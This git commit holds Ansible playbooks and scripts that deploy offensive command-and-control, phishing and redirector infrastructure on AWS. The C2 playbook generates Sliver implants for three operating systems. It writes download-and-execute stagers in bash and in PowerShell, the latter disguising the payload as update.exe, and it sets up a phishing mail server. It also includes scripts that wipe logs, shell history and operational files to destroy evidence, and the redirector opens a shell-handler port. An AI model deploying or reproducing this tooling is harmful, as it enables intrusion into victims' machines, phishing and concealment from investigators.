This commit is contained in:
n0mad1k
2025-04-09 15:22:21 -04:00
commit 241668a84d
23 changed files with 5019 additions and 0 deletions
+2
View File
@@ -0,0 +1,2 @@
vars.yaml
venv
+143
View File
@@ -0,0 +1,143 @@
#!/bin/bash
# Default configurations
DEFAULT_IMAGE_FILTER="*kali-last-snapshot*"
DEFAULT_OWNER_ID="679593333241"
DEFAULT_REGION="us-east-1"
# Debugging flag
DEBUG=false
# Usage function
function usage() {
echo "Usage: $0 [--image-filter <filter>] [--owner-id <owner-id>] [--debug] [--help]"
echo ""
echo "Options:"
echo " --image-filter <filter> Filter for AMI names (default: '${DEFAULT_IMAGE_FILTER}')."
echo " --owner-id <owner-id> Owner ID for filtering AMIs (default: '${DEFAULT_OWNER_ID}')."
echo " --debug Enable verbose debugging."
echo " --help Display this help message."
exit 1
}
# Parse arguments
IMAGE_FILTER="$DEFAULT_IMAGE_FILTER"
OWNER_ID="$DEFAULT_OWNER_ID"
while [[ $# -gt 0 ]]; do
case $1 in
--image-filter)
IMAGE_FILTER="$2"
shift 2
;;
--owner-id)
OWNER_ID="$2"
shift 2
;;
--debug)
DEBUG=true
shift
;;
--help)
usage
;;
*)
echo "Unknown option: $1"
usage
;;
esac
done
if $DEBUG; then
echo "DEBUG: Using image filter: $IMAGE_FILTER"
echo "DEBUG: Using owner ID: $OWNER_ID"
fi
# Step 1: Fetch all AMIs in the default region to identify the latest version
LATEST_AMI=""
LATEST_YEAR=0
LATEST_VERSION=0
AMI_LIST=$(aws ec2 describe-images \
--region "$DEFAULT_REGION" \
--filters "Name=name,Values=$IMAGE_FILTER" "Name=owner-id,Values=$OWNER_ID" \
--query "Images[].[Name]" \
--output text)
if $DEBUG; then
echo "DEBUG: AMI list in $DEFAULT_REGION: $AMI_LIST"
fi
for AMI_NAME in $AMI_LIST; do
if [[ $AMI_NAME != *"-prod-"* ]]; then
# Extract year and version using regex
if [[ $AMI_NAME =~ ([0-9]{4})\.([0-9]+)\.([0-9]+) ]]; then
YEAR=${BASH_REMATCH[1]}
VERSION=${BASH_REMATCH[2]}
if $DEBUG; then
echo "DEBUG: Checking AMI: $AMI_NAME (Year: $YEAR, Version: $VERSION)"
fi
if (( YEAR > LATEST_YEAR )) || (( YEAR == LATEST_YEAR && VERSION > LATEST_VERSION )); then
LATEST_AMI="$AMI_NAME"
LATEST_YEAR=$YEAR
LATEST_VERSION=$VERSION
fi
fi
fi
done
if $DEBUG; then
echo "DEBUG: Latest AMI determined: $LATEST_AMI"
fi
# Step 2: Use the latest AMI name to filter across all regions
if [[ -z "$LATEST_AMI" ]]; then
echo "No valid AMIs found matching the criteria."
exit 1
fi
IMAGE_FILTER_LATEST="${LATEST_AMI%-*}*" # Strip the region-specific suffix and add a wildcard
if $DEBUG; then
echo "DEBUG: Using refined image filter: $IMAGE_FILTER_LATEST"
fi
# Step 3: Fetch AMIs across all regions
REGIONS=$(aws ec2 describe-regions --query "Regions[].RegionName" --output text)
echo "Fetching AMIs with filter '$IMAGE_FILTER_LATEST' and owner ID '$OWNER_ID'..."
AMI_MAP=""
REGION_LIST=()
for REGION in $REGIONS; do
if $DEBUG; then
echo "DEBUG: Querying region: $REGION"
fi
AMI_INFO=$(aws ec2 describe-images \
--region "$REGION" \
--filters "Name=name,Values=$IMAGE_FILTER_LATEST" "Name=owner-id,Values=$OWNER_ID" \
--query "Images[].[Name,ImageId]" \
--output text)
if [[ -n "$AMI_INFO" ]]; then
while read -r NAME AMI_ID; do
echo "$NAME"
echo " $REGION: $AMI_ID"
REGION_LIST+=("$REGION")
AMI_MAP+="$REGION: $AMI_ID"$'\n'
done <<< "$AMI_INFO"
fi
done
# Step 4: Generate YAML
YAML_OUTPUT="aws_region_choices:\n"
for REGION in "${REGION_LIST[@]}"; do
YAML_OUTPUT+=" - $REGION\n"
done
YAML_OUTPUT+="ami_map:\n$AMI_MAP"
echo -e "\nGenerated YAML:\n$YAML_OUTPUT"
+479
View File
@@ -0,0 +1,479 @@
---
- name: Create and configure AWS EC2 instance for C2 Server
hosts: localhost
gather_facts: false
connection: local
vars_files:
- vars.yaml
vars:
ssh_user: "kali"
tasks:
- block:
- name: Select a random AWS region
set_fact:
selected_aws_region: "{{ aws_region_choices | random }}"
- name: Set AMI ID based on region
set_fact:
aws_ami: "{{ ami_map[selected_aws_region] }}"
- name: Create an EC2 key pair
amazon.aws.ec2_key:
access_key: "{{ aws_access_key }}"
secret_key: "{{ aws_secret_key }}"
name: "{{ instance_label }}"
region: "{{ selected_aws_region }}"
state: present
register: key_pair
- name: Save private key locally
copy:
content: "{{ key_pair.key.private_key }}"
dest: "~/.ssh/{{ instance_label }}.pem"
mode: "0600"
when: key_pair.changed
- name: Check if a security group with required properties already exists
amazon.aws.ec2_security_group_info:
filters:
group-name: "security-sg"
region: "{{ selected_aws_region }}"
aws_access_key: "{{ aws_access_key }}"
aws_secret_key: "{{ aws_secret_key }}"
register: existing_sg
ignore_errors: yes
- name: Create a security group for the instance if it doesn't exist
amazon.aws.ec2_group:
name: "security-sg"
description: "Completely open security group for instance {{ instance_label }}"
region: "{{ selected_aws_region }}"
aws_access_key: "{{ aws_access_key }}"
aws_secret_key: "{{ aws_secret_key }}"
rules:
- proto: -1 # Allow all protocols
cidr_ip: "0.0.0.0/0" # Open to all IPv4 addresses
rules_egress:
- proto: -1
cidr_ip: "0.0.0.0/0"
when: existing_sg.security_groups | length == 0
register: c2_sg_result
- name: Launch EC2 instance
amazon.aws.ec2_instance:
aws_access_key: "{{ aws_access_key | default(omit) }}"
aws_secret_key: "{{ aws_secret_key | default(omit) }}"
region: "{{ selected_aws_region }}"
name: "{{ instance_label }}"
image_id: "{{ aws_ami }}"
instance_type: "{{ aws_instance_type }}"
key_name: "{{ instance_label }}"
security_groups:
- "security-sg"
wait: no
volumes:
- device_name: "/dev/xvda"
ebs:
volume_size: 100
delete_on_termination: true
register: ec2_instance
- name: Set instance_id fact for cleanup
set_fact:
instance_id: "{{ ec2_instance.instance_ids[0] | default('') }}"
when: ec2_instance.instances is defined and ec2_instance.instances | length > 0
- name: Wait for EC2 instance to reach running state
amazon.aws.ec2_instance_info:
aws_access_key: "{{ aws_access_key | default(omit) }}"
aws_secret_key: "{{ aws_secret_key | default(omit) }}"
region: "{{ selected_aws_region }}"
instance_ids: "{{ ec2_instance.instance_ids }}"
register: instance_info
retries: 10
delay: 30
until: instance_info.instances[0].state.name == "running"
- name: Fetch the public IP of the instance
command: >
aws ec2 describe-instances
--filters "Name=tag:Name,Values={{ instance_label }}"
"Name=instance-state-name,Values=running"
--query "Reservations[*].Instances[*].PublicIpAddress"
--output text
register: instance_ip_result
environment:
AWS_ACCESS_KEY_ID: "{{ aws_access_key }}"
AWS_SECRET_ACCESS_KEY: "{{ aws_secret_key }}"
AWS_DEFAULT_REGION: "{{ selected_aws_region }}"
retries: 3
delay: 200
until: instance_ip_result.stdout is not none and instance_ip_result.stdout != ""
- name: Set instance_public_ip variable
ansible.builtin.set_fact:
instance_public_ip: "{{ instance_ip_result.stdout | trim }}"
when: instance_ip_result is defined and instance_ip_result.stdout != ""
- name: Add EC2 instance to inventory
add_host:
name: "{{ instance_label }}"
ansible_host: "{{ instance_public_ip }}"
ansible_user: kali
ansible_ssh_private_key_file: "{{ private_key_path }}.pem"
ansible_ssh_common_args: '-o IdentitiesOnly=yes'
- name: Pause for 300 seconds to allow instance initialization
ansible.builtin.pause:
seconds: 300
- name: Validate SSH connection with retries
block:
- name: Attempt SSH connection
ansible.builtin.command:
cmd: ssh -o IdentitiesOnly=yes -o StrictHostKeyChecking=no -i "{{ private_key_path }}.pem" kali@{{ instance_public_ip }} echo "SSH connection successful"
delay: 100 # Adjust delay if needed
retries: 2
register: ssh_validation_result
ignore_errors: yes
- name: Fail if SSH validation fails
ansible.builtin.fail:
msg: "SSH connection validation failed. Check instance settings, SSH key, and security group."
when: (ssh_validation_result is not defined or ssh_validation_result.rc != 0)
- name: Configure AWS EC2 instance
hosts: "{{ instance_label }}"
gather_facts: true
tasks:
- name: Set a custom MOTD
template:
src: motd-aws.j2
dest: /etc/motd
owner: root
group: root
mode: '0644'
become: true
vars:
letsencrypt_email: "{{ letsencrypt_email }}"
mail_hostname: "{{ mail_hostname }}"
domain: "{{ domain }}"
gophish_admin_domain: "{{ gophish_admin_domain }}"
gophish_site_domain: "{{ gophish_site_domain }}"
- name: Hush Default Login Message
become: true
ansible.builtin.shell: |
rm -rf '/usr/bin/kali-motd'
- name: Update apt package list
ansible.builtin.apt:
update_cache: yes
become: true
- name: Install base utilities and tools via apt
become: true
ansible.builtin.apt:
name:
- git
- wget
- curl
- unzip
- python3-pip
- python3-venv
- tmux
- pipx
- nmap
- tcpdump
- hydra
- john
- hashcat
- sqlmap
- gobuster
- dirb
- enum4linux
- dnsenum
- seclists
- responder
- golang
- proxychains
- tor
- crackmapexec
- jq
- unzip
- postfix
- certbot
- opendkim
- opendkim-tools
- dovecot-core
- dovecot-imapd
- dovecot-pop3d
- dovecot-sieve
- dovecot-managesieved
- yq
state: present
- name: Ensure pipx path is configured
ansible.builtin.shell: |
pipx ensurepath
become: true
args:
executable: /bin/bash
- name: Create Tools dir
ansible.builtin.shell: |
mkdir /home/kali/Tools
- name: Install tools via pipx
ansible.builtin.shell: |
export PATH=$PATH:/root/.local/bin
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
pipx install git+https://github.com/blacklanternsecurity/TREVORspray
pipx install impacket
become: true
args:
executable: /bin/bash
- name: Download Kerbrute
ansible.builtin.shell: |
mkdir -p /home/kali/Tools/Kerbrute
wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O /home/kali/Tools/Kerbrute/kerbrute
chmod +x /home/kali/Tools/Kerbrute/kerbrute
become: true
args:
executable: /bin/bash
- name: Clone SharpCollection nightly builds
ansible.builtin.git:
repo: https://github.com/Flangvik/SharpCollection.git
dest: /home/kali/Tools/SharpCollection
version: master
- name: Clone PEASS-ng
ansible.builtin.git:
repo: https://github.com/carlospolop/PEASS-ng.git
dest: /home/kali/Tools/PEASS-ng
- name: Clone MailSniper
ansible.builtin.git:
repo: https://github.com/dafthack/MailSniper.git
dest: /home/kali/Tools/MailSniper
- name: Clone Inveigh
ansible.builtin.git:
repo: https://github.com/Kevin-Robertson/Inveigh.git
dest: /home/kali/Tools/Inveigh
- name: Install Sliver C2 server
ansible.builtin.shell: |
curl https://sliver.sh/install | bash
systemctl enable sliver
systemctl start sliver
become: true
- name: Install Metasploit Framework (Nightly Build)
ansible.builtin.shell: |
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > /home/kali/Tools/msfinstall
chmod 755 /home/kali/Tools/msfinstall
/home/kali/Tools/msfinstall
become: true
args:
executable: /bin/bash
- name: Grab GoPhish
ansible.builtin.shell: |
curl -L "$(curl -s https://api.github.com/repos/gophish/gophish/releases/latest | jq -r '.assets[] | select(.browser_download_url | contains("linux-64bit.zip")) | .browser_download_url')" -o /home/kali/Tools/gophish.zip
unzip /home/kali/Tools/gophish.zip -d /home/kali/Tools/gophish
rm -rf /home/kali/Tools/gophish.zip
chmod +x /home/kali/Tools/gophish
- name: Deploy Gophish config.json with custom admin port
become: true
template:
src: gophish-config.j2
dest: /home/kali/Tools/gophish/config.json
owner: kali
group: kali
mode: '0644'
vars:
gophish_admin_port: "{{ gophish_admin_port }}"
domain: "{{ domain }}"
- name: Configure Postfix main.cf
lineinfile:
path: /etc/postfix/main.cf
regexp: "{{ item.regexp }}"
line: "{{ item.line }}"
with_items:
- { regexp: '^myhostname', line: "myhostname = mail.{{ domain }}" }
- { regexp: '^mydomain', line: "mydomain = {{ domain }}" }
- { regexp: '^myorigin', line: "myorigin = $mydomain" }
- { regexp: '^inet_interfaces', line: "inet_interfaces = all" }
- { regexp: '^inet_protocols', line: "inet_protocols = ipv4" }
- { regexp: '^smtpd_banner', line: "smtpd_banner = $myhostname ESMTP $mail_name" }
- { regexp: '^mynetworks', line: "mynetworks = 127.0.0.0/8 [::1]/128" }
- { regexp: '^relay_domains', line: "relay_domains = $mydestination" }
- { regexp: '^smtpd_tls_cert_file', line: "smtpd_tls_cert_file = /etc/letsencrypt/live/{{ domain }}/fullchain.pem" }
- { regexp: '^smtpd_tls_key_file', line: "smtpd_tls_key_file = /etc/letsencrypt/live/{{ domain }}/privkey.pem" }
- { regexp: '^smtpd_tls_security_level', line: "smtpd_tls_security_level = encrypt" }
- { regexp: '^smtpd_tls_session_cache_database', line: "smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache" }
- { regexp: '^smtp_tls_session_cache_database', line: "smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache" }
- { regexp: '^smtpd_use_tls', line: "smtpd_use_tls = yes" }
- { regexp: '^smtpd_tls_auth_only', line: "smtpd_tls_auth_only = yes" }
- { regexp: '^milter_default_action', line: "milter_default_action = accept" }
- { regexp: '^milter_protocol', line: "milter_protocol = 6" }
- { regexp: '^smtpd_milters', line: "smtpd_milters = unix:/var/spool/postfix/opendkim/opendkim.sock" }
- { regexp: '^non_smtpd_milters', line: "non_smtpd_milters = unix:/var/spool/postfix/opendkim/opendkim.sock" }
become: true
- name: Configure OpenDKIM
lineinfile:
path: /etc/opendkim.conf
regexp: "{{ item.regexp }}"
line: "{{ item.line }}"
with_items:
- { regexp: '^Domain', line: "Domain {{ domain }}" }
- { regexp: '^KeyFile', line: "KeyFile /etc/opendkim/keys/{{ domain }}/mail.private" }
- { regexp: '^Selector', line: "Selector mail" }
- { regexp: '^Socket', line: "Socket local:/var/spool/postfix/opendkim/opendkim.sock" }
- { regexp: '^Syslog', line: "Syslog yes" }
- { regexp: '^UMask', line: "UMask 002" }
- { regexp: '^Mode', line: "Mode sv" }
become: true
- name: Create DKIM directory
file:
path: /etc/opendkim/keys/{{ domain }}
state: directory
owner: opendkim
group: opendkim
mode: 0700
become: true
- name: Generate DKIM keys
command: >
opendkim-genkey -D /etc/opendkim/keys/{{ domain }} -d {{ domain }} -s mail
args:
creates: /etc/opendkim/keys/{{ domain }}/mail.private
become: true
- name: Set permissions for DKIM keys
file:
path: /etc/opendkim/keys/{{ domain }}/mail.private
owner: opendkim
group: opendkim
mode: 0600
become: true
- name: Configure OpenDKIM TrustedHosts
copy:
content: |
127.0.0.1
::1
localhost
{{ domain }}
dest: /etc/opendkim/TrustedHosts
owner: opendkim
group: opendkim
mode: 0644
become: true
- name: Enable submission port (587) in master.cf
blockinfile:
path: /etc/postfix/master.cf
insertafter: '^#submission'
block: |
submission inet n - y - - smtpd
-o syslog_name=postfix/submission
-o smtpd_tls_security_level=encrypt
-o smtpd_sasl_auth_enable=yes
-o smtpd_recipient_restrictions=permit_sasl_authenticated,reject
-o smtpd_relay_restrictions=permit_sasl_authenticated,reject
become: true
- name: Configure Dovecot for Postfix SASL
blockinfile:
path: /etc/dovecot/conf.d/10-master.conf
insertafter: '^service auth {'
block: |
# Postfix smtp-auth
unix_listener /var/spool/postfix/private/auth {
mode = 0660
user = postfix
group = postfix
}
become: true
- name: Set Dovecot auth_mechanisms
lineinfile:
path: /etc/dovecot/conf.d/10-auth.conf
regexp: '^auth_mechanisms'
line: 'auth_mechanisms = plain login'
become: true
- name: Create Dovecot password file for SASL authentication
file:
path: /etc/dovecot/passwd
state: touch
mode: '0600'
owner: dovecot
group: dovecot
become: true
- name: Add SMTP auth user to Dovecot
lineinfile:
path: /etc/dovecot/passwd
line: "{{ smtp_auth_user }}:{{ smtp_auth_pass | password_hash('sha512_crypt') }}"
become: true
- name: Disable system auth and use passwd-file
lineinfile:
path: /etc/dovecot/conf.d/10-auth.conf
regexp: '^!include auth-system.conf.ext'
line: '#!include auth-system.conf.ext'
become: true
- name: Add auth-passwdfile configuration
blockinfile:
path: /etc/dovecot/conf.d/10-auth.conf
insertafter: '^auth_mechanisms ='
block: |
passdb {
driver = passwd-file
args = scheme=sha512_crypt /etc/dovecot/passwd
}
userdb {
driver = static
args = uid=vmail gid=vmail home=/var/vmail/%u
}
become: true
- name: Create vmail group
group:
name: vmail
gid: 5000
state: present
become: true
- name: Create vmail user
user:
name: vmail
uid: 5000
group: vmail
create_home: no
become: true
- name: Restart Postfix
service:
name: postfix
state: restarted
become: true
- name: Restart Dovecot
service:
name: dovecot
state: restarted
become: true
+45
View File
@@ -0,0 +1,45 @@
aws_access_key: "YOUR_AWS_ACCESS_KEY" # Your AWS access key
aws_secret_key: "YOUR_AWS_SECRET_KEY" # Your AWS secret key
aws_region_choices:
- ap-south-1
- eu-north-1
- eu-west-3
- eu-west-2
- eu-west-1
- ap-northeast-3
- ap-northeast-2
- ap-northeast-1
- ca-central-1
- sa-east-1
- ap-southeast-1
- ap-southeast-2
- eu-central-1
- us-east-1
- us-east-2
- us-west-1
- us-west-2
ami_map:
ap-south-1: ami-0eeeb93aa51c48595
eu-north-1: ami-05bb943edc7d12d2f
eu-west-3: ami-01c1cbe631d766dcd
eu-west-2: ami-0a9aba19a0b8e81da
eu-west-1: ami-05b908c468c3a5373
ap-northeast-3: ami-03809b00a4487dc46
ap-northeast-2: ami-048f3574b7d304c04
ap-northeast-1: ami-0b74305a62f8299e1
ca-central-1: ami-0415ef7b9c3019285
sa-east-1: ami-0ab7401488d50bf51
ap-southeast-1: ami-0d2d12d390e9c0a34
ap-southeast-2: ami-0bd344ea1f492feab
eu-central-1: ami-093d1ceb3279619b0
us-east-1: ami-061b17d332829ab1c
us-east-2: ami-0327cf1c5e479e093
us-west-1: ami-0fbe3a8e1dcd86f23
us-west-2: ami-030d7e8d6fbca8332
aws_instance_type: "t2.medium" # EC2 instance type
domain: "example.com"
mail_hostname: "mail.example.com"
letsencrypt_email: "admin@example.com"
smtp_auth_user: "phishuser"
smtp_auth_pass: "SuperSecretPass123!"
gophish_admin_port: "2222"
+381
View File
@@ -0,0 +1,381 @@
---
- name: Deploy AWS C2 server
hosts: localhost
gather_facts: false
connection: local
vars:
region: "{{ aws_region | default('us-east-1') }}"
instance_type: "{{ size | default('t2.medium') }}"
instance_name: "{{ c2_name | default('c2') }}"
domain: "{{ domain | default('example.com') }}"
c2_subdomain: "mail"
tasks:
- name: Set a random AWS region if not specified
set_fact:
selected_aws_region: "{{ aws_region_choices | random }}"
when: aws_region is not defined
- name: Create an EC2 key pair
amazon.aws.ec2_key:
name: "{{ instance_name }}"
region: "{{ region }}"
state: present
register: key_pair
- name: Save private key locally
copy:
content: "{{ key_pair.key.private_key }}"
dest: "~/.ssh/{{ instance_name }}.pem"
mode: "0600"
when: key_pair.changed
- name: Create security group for C2 server
amazon.aws.ec2_group:
name: "{{ instance_name }}-sg"
description: "Security group for C2 server"
region: "{{ region }}"
rules:
- proto: tcp
ports:
- 22
- 50051 # Sliver gRPC port
- 8888 # C2 HTTP listener
- 8443 # Beacon server
cidr_ip: 0.0.0.0/0
rules_egress:
- proto: -1
cidr_ip: 0.0.0.0/0
register: c2_sg
- name: Launch C2 EC2 instance
amazon.aws.ec2_instance:
name: "{{ instance_name }}"
region: "{{ region }}"
image_id: "{{ ami_map[region] }}"
instance_type: "{{ instance_type }}"
key_name: "{{ instance_name }}"
security_group: "{{ c2_sg.group_id }}"
network:
assign_public_ip: true
tags:
Name: "{{ instance_name }}"
Role: "c2"
wait: yes
register: c2_instance
- name: Save C2 IP
set_fact:
c2_ip: "{{ c2_instance.instances[0].public_ip_address }}"
- name: Wait for SSH to become available
wait_for:
host: "{{ c2_ip }}"
port: 22
delay: 10
timeout: 300
state: started
- name: Add C2 server to inventory
add_host:
name: c2
ansible_host: "{{ c2_ip }}"
ansible_user: "{{ ssh_user | default('kali') }}"
ansible_ssh_private_key_file: "~/.ssh/{{ instance_name }}.pem"
groups: c2servers
- name: Configure C2 server
hosts: c2servers
become: true
vars:
domain: "{{ domain | default('example.com') }}"
c2_subdomain: "mail"
letsencrypt_email: "{{ letsencrypt_email | default('admin@example.com') }}"
zero_logs: "{{ zero_logs | default(true) }}"
redirector_ip: "{{ hostvars['localhost']['redirector_ip'] | default('127.0.0.1') }}"
tasks:
- name: Update apt cache
apt:
update_cache: yes
- name: Install required packages
apt:
name:
- git
- wget
- curl
- python3-pip
- golang
- tmux
- nmap
- jq
- secure-delete
- socat
state: present
- name: Create directories for C2 operation
file:
path: "{{ item }}"
state: directory
mode: '0700'
owner: root
group: root
with_items:
- /opt/c2
- /opt/beacons
- /opt/payloads
- name: Create clean-logs.sh script
copy:
content: |
#!/bin/bash
# Zero-logs maintenance script
umask 077
# Disable syslog temporarily
systemctl stop rsyslog 2>/dev/null
systemctl stop systemd-journald 2>/dev/null
# Clear system logs
find /var/log -type f -name "*.log" -exec truncate -s 0 {} \;
find /var/log -type f -name "auth.log*" -exec truncate -s 0 {} \;
find /var/log -type f -name "syslog*" -exec truncate -s 0 {} \;
journalctl --vacuum-time=1s 2>/dev/null
# Clear bash history
for histfile in /root/.bash_history /home/*/.bash_history; do
[ -f "$histfile" ] && cat /dev/null > "$histfile" 2>/dev/null
done
history -c
# Clear Sliver logs
find /root/.sliver/logs -type f -exec cat /dev/null > {} \; 2>/dev/null
# Clear temporary directories
rm -rf /tmp/* /var/tmp/* 2>/dev/null
# Restart logging services
systemctl start systemd-journald 2>/dev/null
systemctl start rsyslog 2>/dev/null
echo "[+] Log cleaning complete"
exit 0
dest: /opt/c2/clean-logs.sh
mode: '0700'
owner: root
group: root
- name: Create secure-exit.sh script
copy:
content: |
#!/bin/bash
# Secure cleanup script
# Configuration
SECURE_DELETE_PASSES=7
MEMORY_WIPE=true
# Set secure umask
umask 077
# Function to securely delete files
secure_delete() {
local target=$1
echo "[+] Securely deleting: $target"
if command -v srm > /dev/null; then
srm -vzf $target 2>/dev/null
elif command -v shred > /dev/null; then
shred -vzfn $SECURE_DELETE_PASSES $target 2>/dev/null
else
# Fallback to dd if specialized tools aren't available
dd if=/dev/urandom of=$target bs=1M count=10 conv=notrunc 2>/dev/null
dd if=/dev/zero of=$target bs=1M count=10 conv=notrunc 2>/dev/null
rm -f $target 2>/dev/null
fi
}
echo "[+] Beginning secure exit procedure..."
# Stop all operational services
echo "[+] Stopping operational services..."
services=("sliver")
for service in "${services[@]}"; do
systemctl stop $service 2>/dev/null
done
# Kill any remaining operational processes
echo "[+] Terminating operational processes..."
process_names=("sliver" "nc" "python")
for proc in "${process_names[@]}"; do
pkill -9 $proc 2>/dev/null
done
# Clear all logs
echo "[+] Clearing logs..."
bash /opt/c2/clean-logs.sh
# Securely delete operational files
echo "[+] Removing operational files..."
operational_dirs=(
"/opt/c2"
"/opt/beacons"
"/opt/payloads"
"/root/.sliver"
)
for dir in "${operational_dirs[@]}"; do
find $dir -type f 2>/dev/null | while read file; do
secure_delete "$file"
done
rm -rf $dir 2>/dev/null
done
# Remove SSH keys
echo "[+] Removing SSH keys and configs..."
find /home/*/.ssh /root/.ssh -type f 2>/dev/null | while read file; do
secure_delete "$file"
done
# Clean memory if requested
if $MEMORY_WIPE; then
echo "[+] Wiping system memory..."
sync
echo 3 > /proc/sys/vm/drop_caches
swapoff -a
swapon -a
fi
echo "[+] Secure exit completed. Infrastructure has been sanitized."
# Remove this script itself
exec shred -n $SECURE_DELETE_PASSES -uz $0
dest: /opt/c2/secure-exit.sh
mode: '0700'
owner: root
group: root
- name: Create beacon-server.sh script
copy:
content: |
#!/bin/bash
# Beacon server script
# Configuration
BEACONS_DIR="/opt/beacons"
WEBSERVER_PORT=8443
# Set secure umask
umask 077
# Ensure beacons directory exists
mkdir -p $BEACONS_DIR
# Generate beacons using Sliver
echo "[+] Generating beacons for all platforms..."
# Make sure Sliver server is running
if ! pgrep -x "sliver-server" > /dev/null; then
echo "[!] Sliver server is not running, starting it..."
systemctl start sliver
sleep 5
fi
# Generate Windows beacon
sliver-cli generate --http {{ ansible_host }}:8888 --os windows --arch amd64 --save $BEACONS_DIR/windows.exe
# Generate Linux beacon
sliver-cli generate --http {{ ansible_host }}:8888 --os linux --arch amd64 --save $BEACONS_DIR/linux
# Generate macOS beacon
sliver-cli generate --http {{ ansible_host }}:8888 --os darwin --arch amd64 --save $BEACONS_DIR/macos
# Generate stagers
echo "#!/bin/bash
curl -s {{ ansible_host }}:8443/linux | chmod +x && ./linux" > $BEACONS_DIR/beacon.sh
chmod +x $BEACONS_DIR/beacon.sh
echo "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;
\$url = 'http://{{ ansible_host }}:8443/windows.exe';
\$outpath = \"\$env:TEMP\\update.exe\";
Invoke-WebRequest -Uri \$url -OutFile \$outpath;
Start-Process -NoNewWindow -FilePath \$outpath;" > $BEACONS_DIR/beacon.ps1
echo "[+] All beacons generated successfully"
# Serve beacons using Python's HTTP server
echo "[+] Starting HTTP server on port $WEBSERVER_PORT..."
cd $BEACONS_DIR
python3 -m http.server $WEBSERVER_PORT --bind 0.0.0.0 &
SERVER_PID=$!
echo "[+] Beacon server started with PID $SERVER_PID"
echo "[+] Beacons available at http://{{ ansible_host }}:$WEBSERVER_PORT/"
# Keep script running
trap "kill $SERVER_PID; echo '[+] Beacon server stopped'; exit 0" INT
while true; do sleep 1; done
dest: /opt/c2/beacon-server.sh
mode: '0700'
owner: root
group: root
- name: Install Sliver C2 framework
shell: |
curl https://sliver.sh/install | bash
args:
creates: /usr/local/bin/sliver-server
- name: Create Sliver service file
copy:
content: |
[Unit]
Description=Sliver C2 Server
After=network.target
[Service]
Type=simple
User=root
Group=root
WorkingDirectory=/root/.sliver
ExecStart=/usr/local/bin/sliver-server daemon
Restart=always
RestartSec=10
# Security measures
PrivateTmp=true
ProtectHome=false
NoNewPrivileges=true
# Hide process information
StandardOutput=null
StandardError=null
[Install]
WantedBy=multi-user.target
dest: /etc/systemd/system/sliver.service
mode: '0644'
owner: root
group: root
- name: Start and enable Sliver service
systemd:
name: sliver
state: started
enabled: yes
daemon_reload: yes
- name: Set up cron job for log cleaning
cron:
name: "Clean logs"
minute: "0"
hour: "*/6"
job: "/opt/c2/clean-logs.sh > /dev/null 2>&1"
when: zero_logs|bool
- name: Start beacon server
shell: |
nohup /opt/c2/beacon-server.sh > /dev/null 2>&1 &
args:
creates: /opt/beacons/windows.exe
+476
View File
@@ -0,0 +1,476 @@
---
- name: Deploy AWS redirector server
hosts: localhost
gather_facts: false
connection: local
vars:
region: "{{ aws_region | default('us-east-1') }}"
instance_type: "{{ size | default('t2.medium') }}"
instance_name: "{{ redirector_name | default('redirector') }}"
domain: "{{ domain | default('example.com') }}"
redirector_subdomain: "cdn"
tasks:
- name: Set a random AWS region if not specified
set_fact:
selected_aws_region: "{{ aws_region_choices | random }}"
when: aws_region is not defined
- name: Create an EC2 key pair
amazon.aws.ec2_key:
name: "{{ instance_name }}"
region: "{{ region }}"
state: present
register: key_pair
- name: Save private key locally
copy:
content: "{{ key_pair.key.private_key }}"
dest: "~/.ssh/{{ instance_name }}.pem"
mode: "0600"
when: key_pair.changed
- name: Create security group for redirector
amazon.aws.ec2_group:
name: "{{ instance_name }}-sg"
description: "Security group for redirector"
region: "{{ region }}"
rules:
- proto: tcp
ports:
- 22
- 80
- 443
- 4444 # Shell handler port
cidr_ip: 0.0.0.0/0
rules_egress:
- proto: -1
cidr_ip: 0.0.0.0/0
register: redirector_sg
- name: Launch redirector EC2 instance
amazon.aws.ec2_instance:
name: "{{ instance_name }}"
region: "{{ region }}"
image_id: "{{ ami_map[region] }}"
instance_type: "{{ instance_type }}"
key_name: "{{ instance_name }}"
security_group: "{{ redirector_sg.group_id }}"
network:
assign_public_ip: true
tags:
Name: "{{ instance_name }}"
Role: "redirector"
wait: yes
register: redirector_instance
- name: Save redirector IP
set_fact:
redirector_ip: "{{ redirector_instance.instances[0].public_ip_address }}"
- name: Wait for SSH to become available
wait_for:
host: "{{ redirector_ip }}"
port: 22
delay: 10
timeout: 300
state: started
- name: Add redirector to inventory
add_host:
name: redirector
ansible_host: "{{ redirector_ip }}"
ansible_user: "{{ ssh_user | default('kali') }}"
ansible_ssh_private_key_file: "~/.ssh/{{ instance_name }}.pem"
groups: redirectors
- name: Configure redirector
hosts: redirectors
become: true
vars:
domain: "{{ domain | default('example.com') }}"
redirector_subdomain: "cdn"
letsencrypt_email: "{{ letsencrypt_email | default('admin@example.com') }}"
zero_logs: "{{ zero_logs | default(true) }}"
shell_handler_port: 4444
c2_ip: "{{ hostvars['localhost']['c2_ip'] | default('127.0.0.1') }}"
tasks:
- name: Update apt cache
apt:
update_cache: yes
- name: Install required packages
apt:
name:
- nginx
- certbot
- python3-certbot-nginx
- socat
- netcat-openbsd
- cryptsetup
- secure-delete
state: present
- name: Create directories for OPSEC scripts
file:
path: "{{ item }}"
state: directory
mode: '0700'
owner: root
group: root
with_items:
- /opt/c2
- /opt/shell-handler
- name: Create clean-logs.sh script
copy:
content: |
#!/bin/bash
# Zero-logs maintenance script
umask 077
# Disable syslog temporarily
systemctl stop rsyslog 2>/dev/null
systemctl stop systemd-journald 2>/dev/null
# Clear system logs
find /var/log -type f -name "*.log" -exec truncate -s 0 {} \;
find /var/log -type f -name "auth.log*" -exec truncate -s 0 {} \;
find /var/log -type f -name "syslog*" -exec truncate -s 0 {} \;
journalctl --vacuum-time=1s 2>/dev/null
# Clear bash history
for histfile in /root/.bash_history /home/*/.bash_history; do
[ -f "$histfile" ] && cat /dev/null > "$histfile" 2>/dev/null
done
history -c
# Clear NGINX logs
for nginx_log in /var/log/nginx/*; do
[ -f "$nginx_log" ] && cat /dev/null > "$nginx_log" 2>/dev/null
done
# Clear temporary directories
rm -rf /tmp/* /var/tmp/* 2>/dev/null
# Restart logging services
systemctl start systemd-journald 2>/dev/null
systemctl start rsyslog 2>/dev/null
